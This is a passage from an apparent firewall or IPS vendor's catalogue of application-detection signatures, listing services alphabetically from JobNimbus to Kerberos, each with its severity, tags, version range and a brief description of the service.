Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: JobNimbus - project, contact, and task management tools wrapped in a simple interface.
Back to top

Jobpage

About this situation: Application Jobpage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: JobPage - software company focusing on developing a new solution for hiring by small and mid-sized businesses.
Back to top

Jobscience

About this situation: Application Jobscience detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jobscience
Back to top

Jobscore-Jobseeker

About this situation: JobScore Jobseeker usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: The JobScore platform includes a cooperative recruiting network that your company may choose to opt in to. They leverage highly tuned matching technology to recommend qualified, interested candidates for specific job openings.
Back to top

JobsDB

About this situation: Application JobsDB detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: JobsDB is a job portal that helps to create jobs profiles.
Back to top

JobServe

About this situation: Application JobServe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: JobServe providing job services to job seekers and advertisers.
Back to top

JobStreet-Philippines

About this situation: Application JobStreet-Philippines detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: JobStreet.com is an online job portal that offers online recruitment.
Back to top

Jobvite

About this situation: Jobvite usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: Jobvite Hire improves the speed and quality of your hiring process through applicant tracking, social media recruiting, and candidate database search.Social recruiting and applicant tracking created for companies with the highest expectations of candidate quality and recruiting technology.
Back to top

Jogobu

About this situation: Application Jogobu detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jogobu develop and market software and Internet applications.
Back to top

John-Hancock

About this situation: Application John-Hancock detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: John Hancock provides insurance and financial services products including life insurance, 401
Back to top

JoinMe

About this situation: Application JoinMe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Join.me provides screen sharing, online meetings and team collaboration are all fast and easy.
Back to top

Joiqu

About this situation: Application Joiqu detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Joiqu is a project workspace for collaborating, communicating and working in the cloud to keep people in the loop and up to date on work that matters.
Back to top

Jolicloud

About this situation: Application Jolicloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jolicloud is computing platform built around your life in the cloud. Jolicloud is the home for your most precious content.
Back to top

JonDonym-Anonymous-Proxy

About this situation: JonDonym Anonymous Proxy (Jap) usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-1128-5242
Description: Jap is a proxy software which allows users to surf the internet anonymously and unobservably.
Back to top

Joomag

About this situation: Application Joomag detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Joomag is a digital publishing service that provides solution for publishing, distributing, tracking and monetizing publications online. It helps do digital interactive magazines, catalogues, brochures and e-books.
Back to top

Joomla

About this situation: Joomla usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-516-5211
Last changed: sgpkg-ips-939-5242
Description: Joomla is a free and open source content management system (CMS) for publising content on the internet.
Back to top

Joomlatools

About this situation: Application Joomlatools detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Joomla
Back to top

Joost

About this situation: Joost usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: An Internet TV service.
Back to top

Jostle

About this situation: Application Jostle detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jostle's cloud-based intranet engages employees over 3x better than either traditional intranets or social business platforms, thanks to its unique people-centric approach and elegant turnkey design.
Back to top

Jot-Form

About this situation: Application Jot-Form detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: JotForms form builder helps you create and publish online forms anywhere, anytime without writing a single line of code.
Back to top

Jott

About this situation: Application Jott detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jott Messenger
Back to top

Jottacloud

About this situation: Application Jottacloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jottacloud lets you securely copy, synchronize, save and share files from all of your devices.
Back to top

Journal-Technologies

About this situation: Application Journal-Technologies detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Journal Technologies provides solutions to manage caseloads for courts, prosecution agencies, public defenders, pretrial services offices, probation and parole offices, and other government entities.
Back to top

Journey

About this situation: Application Journey detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Journey allows build custom enterprise mobile apps, and then deploy them to your workforce.
Back to top

Journyx

About this situation: Application Journyx detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Journyx is a time tracking and project management software company
Back to top

Joyent

About this situation: Application Joyent detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Hosting, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Joyent is cloud computing infrastructure and data analytics company, offering organizations public and hybrid cloud infrastructure for today's demanding real-time web and mobile applications.
Back to top

Joyn

About this situation: Joyn usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Description: Joyn is a German streaming service. This application is meant for blocking only.
Back to top

JPEG File

About this situation: JPEG file detected
Context: File Stream Redirection
Severity: 2
Tags: File Type Identification, Content Identification, Media File, JPEG Image
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-409-4219
Description:
Back to top

jQuery

About this situation: jQuery usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-769-5211
Description: jQuery is a popular javascript code library.
Back to top

JSON-RPC

About this situation: JSON-RPC usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Remote control
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1104-5242
Description: JSON-RPC traffic detected. JSON-RPC is a simple remote procedure call protocol using JSON format.
Back to top

JSTOR

About this situation: Application JSTOR detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: JSTOR originally containing digitized back issues of academic journals, it now also includes books and primary sources, and current issues of journals.
Back to top

Jugem

About this situation: JUGEM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a Japanese blogging service that allows users to write and read content.
Back to top

Jump-TV

About this situation: Jump TV usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based video-streaming/IP-TV service where users can watch videos and/or live TV using just a web browser.
Back to top

JumpBox

About this situation: Application JumpBox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: JumpBox allows you to focus on using Open Source server software rather than maintaining it.
Back to top

Jumpchart

About this situation: Application Jumpchart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jumpchart provides ecommerce software solutions for online businesses.
Back to top

Jumplead-Lead-Generation

About this situation: Application Jumplead-Lead-Generation detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jumplead is an online sales and management system that generates targeted leads from an existing website in real time.
Back to top

Jumpseller

About this situation: Application Jumpseller detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jumpseller provides setting up an online store and infrastructure, managing backups, updates, developing software and ensuring security.
Back to top

Jumpshare

About this situation: Application Jumpshare detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jumpshare is a service to share photos, videos, docs, music and code.
Back to top

JungleDisk

About this situation: JungleDisk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-630-5211
Description: JungleDisk is a online backup, storage and file sharing service.
Back to top

Juniper-Networks

About this situation: Application Juniper-Networks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Juniper Networks offers network solutions that help service providers, enterprises and the public sector.
Back to top

Juno-Webmail

About this situation: Application Juno-Webmail detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Juno is an Internet service provider based in the United States. Juno Webmail is an email service for Juno users.
Back to top

Justachat

About this situation: Justachat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

JustAddCommerce

About this situation: Application JustAddCommerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: JustAddCommerce provides shopping cart e-business system software and hardware platform.
Back to top

JustAddContent

About this situation: Application JustAddContent detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Just Add Content provide website design, security, hosting, maintenance, backups, and a mobile compatible website in one package.
Back to top

JustCloud

About this situation: Application JustCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Professional Cloud Storage from JustCloud is Simple, Fast and Secure. Just Cloud will automatically backup the documents, photos, music and videos stored on your computer, to the cloud so you are never without files again.
Back to top

Justcoin

About this situation: Application Justcoin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Justcoin is a digital currency exchange. Using Justcoin's exchange platform, customers can buy and sell digital currencies such as bitcoin
Back to top

JustFoodERP

About this situation: Application JustFoodERP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: JustFoodERP is a software solution for food processors and distributors.
Back to top

Justuno

About this situation: Application Justuno detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Justuno provides tools deigned to leads and revenue. It offers platform that enables digital marketers to design and implement promotions.
Back to top

JWPlayer

About this situation: Application JWPlayer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bits on the Run is a powerful and flexible software-as-a-service (SaaS) video management system.
Back to top

K3btg

About this situation: Application K3btg detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: K3 is a supplier of integrated business systems to retailers, manufacturers and distributors.
Back to top

Kaavo

About this situation: Kaavo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Kaavo provides cloud management software to automate the deployment and management of any application, workload, or IT environment across public, private, and hybrid clouds. Kaavo's solution delivers single click deployment of simple and complex applications, and autopilot capabilities to automatically manage runtime service levels. Kaavo provides a SaaS version of IMOD as well as an on-premise version for select private clouds.
Back to top

Kadzoom

About this situation: Application Kadzoom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kadzoom provides eCommerce website solution to sell products online.
Back to top

Kahoot!

About this situation: Application Kahoot! detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kahoot
Back to top

Kaiser-Permanente-Healthy

About this situation: Application Kaiser-Permanente-Healthy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Healthy web portal of Kaiser Permanente provides members to manage their medical records, schedule appointments, manage prescriptions through pharmacy center, shop health plans, seek general health and wellness information and locate Kaiser services.
Back to top

Kaixin001

About this situation: Kaixin001 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-453-4333
Last changed: sgpkg-ips-628-5211
Description: Kaixin001 (www.kaixin001.com) is a social networking site targeting the Chinese-speaking population.
Back to top

Kaizentek

About this situation: Application Kaizentek detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kaizen Technologies Inc. is an Information Technology and Engineering Services company.
Back to top

Kajabi

About this situation: Application Kajabi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kajabi is an online content management system
Back to top

KakaoTalk

About this situation: KakaoTalk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Description: KakaoTalk is an instant messaging application majorly targeting mobile devices such as smart phones and tablets. KakaoTalk users can communicate with each other with text message and audio call, plus the exchange of multimedia content such as photos, videos, voice messages, etc.
Back to top

Kali.net

About this situation: Kali.net usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: Kali is an IPX network emulator for DOS and Windows, enabling legacy multiplayer games to work over a modern TCP/IP network such as the Internet. Source: Wikipedia
Back to top

Kalido

About this situation: Application Kalido detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kalido is a provider of business-driven information management software, enabling companies to manage data as a shared enterprise asset with speed, agility and flexibility
Back to top

KalioCommerce

About this situation: Application KalioCommerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KalioCommerce is an eCommerce software, that gives access to business functions and product catalog information for online store.
Back to top

Kallidus-Talent

About this situation: Application Kallidus-Talent detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Talent Management Succession Planning Solutions, Performance Management System.
Back to top

Kaltura

About this situation: Kaltura usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-943-5242
Last changed: sgpkg-ips-943-5242
Description: Kaltura is an online video solution provider.
Back to top

Kampyle

About this situation: Application Kampyle detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kampyle is a customer feedback platform that helps digital enterprises listen, understand, and act across digital touchpoints.
Back to top

Kana

About this situation: Application Kana detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KANA provides CRM Solution which helps the world's best known brands master the customer service experience and knowledge management.
Back to top

Kanban-Tool

About this situation: Kanban Tool usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description: This software is a visual project management application for visualizing and optimizing workflow and real time team collaboration. Source: Wikipedia
Back to top

Kanbanchi

About this situation: Application Kanbanchi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kanbanchi helps you to plan and organize your work and life using beautifully simple dashboard for your Google Drive (Google Apps)
Back to top

Kanbanery

About this situation: Application Kanbanery detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kanbanery is a visual project management software tool for tracking software, construction, personal kanban, legal, and other types of projects using the Kanban Method
Back to top

KanbanFlow

About this situation: Application KanbanFlow detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KanbanFlow is a lean project management tool allowing real-time collaboration between team members. Supports the Pomodoro technique for time tracking.
Back to top

Kanbanize

About this situation: Application Kanbanize detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kanbanize is visual management software which enables real-time collaboration via Kanban boards online.
Back to top

KangoGift

About this situation: Application KangoGift detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KangoGift makes it easy to say thanks at work. Named a Brilliant Idea by Entrepreneur Magazine for making recognition instant, employees can send large and small (even 'micro') gifts by cell, email, or mail to celebrate great work. Companies turn to KangoGift's innovative social recognition and rewards platform to improve employee engagement
Back to top

Kanta

About this situation: Kanta usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Health, Application Routing
First detected in: sgpkg-ips-754-5211
Last changed: sgpkg-ips-1238-5242
Description: Kanta is a Finnish national patient data and prescription service. It provides access to both individual as well as professionals, and combines services from both private and public sector.
Back to top

KAP-Virtual-Data-Room

About this situation: Application KAP-Virtual-Data-Room detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KAP Virtual Data Room with Adobe lifecycle is portal. It enables you to arrange your documents in a preferred order and gives global access to all your partners and suppliers.
Back to top

Kapost

About this situation: Application Kapost detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kapost is provider of content marketing software, enabling brands to produce the content they need to generate and nurture leads. The Kapost system organizes content marketing into a structured business process. Including planning, production, distribution and analysis for the full range of content types logs, white papers, video, social media, landing pages, emails Kapost also integrates with leading marketing automation systems
Back to top

Kapta

About this situation: Application Kapta detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kapta's Agile Business Management software for align employees and deliver on goals.
Back to top

Karaoke-Cloud

About this situation: Application Karaoke-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Karaokecloud.com is a way to live-stream karaoke songs.
Back to top

Karmacrm

About this situation: KarmaCRM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows users to keep track of clients and prospects, Calendars, events, Tasks, Reporting, Sales Automation, Contacts Automation etc.
Back to top

Karpower

About this situation: Application Karpower detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Karpower is an automotive vehicle valuation company
Back to top

Kartmagic

About this situation: Application Kartmagic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kartmagic is a cloud based SaaS platform that helps to create online store for businesses.
Back to top

Kaseya

About this situation: Kaseya usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Remote control, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: This software allows users to implement IT policies, procedures, and systems management across highly distributed collections of computers, servers, workstations, laptops, or mobile devices. Source: Wikipedia
Back to top

Kaseya-IT-toolkit

About this situation: Application Kaseya-IT-toolkit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kaseya provides real-time automated disk backup, disk imaging, file level backup and bare metal restore for Windows servers and workstations.
Back to top

KashFlow

About this situation: Application KashFlow detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Specialises in online accounting software for small businesses owners with an emphasis on ease of use, automation and integration.
Back to top

Kashoo

About this situation: Application Kashoo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kashoo mobile and online accounting software for small business. Cloud based system for invoicing, expense tracking and bookkeeping.
Back to top

Kaspersky

About this situation: Application Kaspersky detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kaspersky Lab is the privately held vendor of endpoint protection solutions.
Back to top

Kaspersky-AV

About this situation: Kaspersky AV usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-489-5211
Last changed: sgpkg-ips-1790-5242
Description: Kaspersky AV (Anti-Virus) is an application which provides antivirus protection against malicious programs.
Back to top

Kaspersky-Network-Agent

About this situation: Kaspersky Network Agent usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-939-5242
Description: Kaspersky Network agent provides communication between the Administration server and Kaspersky Lab antivirus software installed on a computer. The application uses a client server model and relies on TLS, SOAP over HTTP and UDP for communications with the server.
Back to top

Kaspersky-Security-Network

About this situation: Kaspersky Security Network traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-511-5211
Last changed: sgpkg-ips-1795-5242
Description: Kaspersky Security Network is used by Kaspersky Lab products (such as Kaspersky Anti-Virus) to query up-to-date reputation information of programs and websites.
Back to top

Kaspersky_Security_Network

About this situation: Kaspersky Security Network IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Description: A situation for IP addresses matching to known Kaspersky Security Network hosts.
Back to top

Kauppalehti

About this situation: Kauppalehti usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-628-5211
Description: Kauppalehti is a Finnish daily business newspaper.
Back to top

Kayako

About this situation: Application Kayako detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kayako is a developer and vendor of help desk and customer support software.
Back to top

Keas

About this situation: Application Keas detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Keas is a personalized employee health and wellness program combining interactive media to create a better workforce.
Back to top

Keek

About this situation: Keek usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: that enables its users to upload video status updates, which are called "keeks". Users can post keeks to the keek website using a webcam or via the Keek mobile apps for Android or iPhone. Source: Wikipedia
Back to top

Keen-IO

About this situation: Application Keen-IO detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Keen IO makes APIs that developers use to build custom analytics for teams. Its managed analytics infrastructure is supported by APIs for data collection, analysis, and visualization.
Back to top

Keepandshare

About this situation: KeepandShare usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A file-sharing service that allows users to upload/download files over the web.
Back to top

KeeperSecurity

About this situation: Application KeeperSecurity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Keeper password vault provides password management and online file storage. Manage passwords and store digital files safely and securely across platforms.
Back to top

Keepit

About this situation: Application Keepit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Keepit is online backup solution for business and home using.
Back to top

KeepMeBooked

About this situation: Application KeepMeBooked detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KeepMeBooked is web-based software that help owners of small independent hotels manage their bookings (online and offline). Hotel owners can use a simple drag-and-drop interface to manage their bookings, instead of a paper desk diary.
Back to top

KeepVault

About this situation: Application KeepVault detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KeepVault online backup software and service provides real-time, automatic, and continuous data file backup to a local hard drive or secure online storage.
Back to top

Kenna

About this situation: Application Kenna detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kenna is a software-as-a-service Risk and Vulnerability Intelligence platform that accurately measures risk and prioritizes remediation efforts before an attacker can exploit an organizations weaknesses.
Back to top

Kenshoo

About this situation: Application Kenshoo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1731-5242
Description: Kenshoo is the only Facebook strategic Preferred Marketing Developer with native API solutions for ads across Facebook, FBX, Twitter, Google, Yahoo, Bing, Baidu, and CityGrid.
Back to top

Kentico

About this situation: Application Kentico detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kentico provides marketing solution that's customizable for customer-centric marketing across channels, on-premise or in the cloud.
Back to top

Kerberos

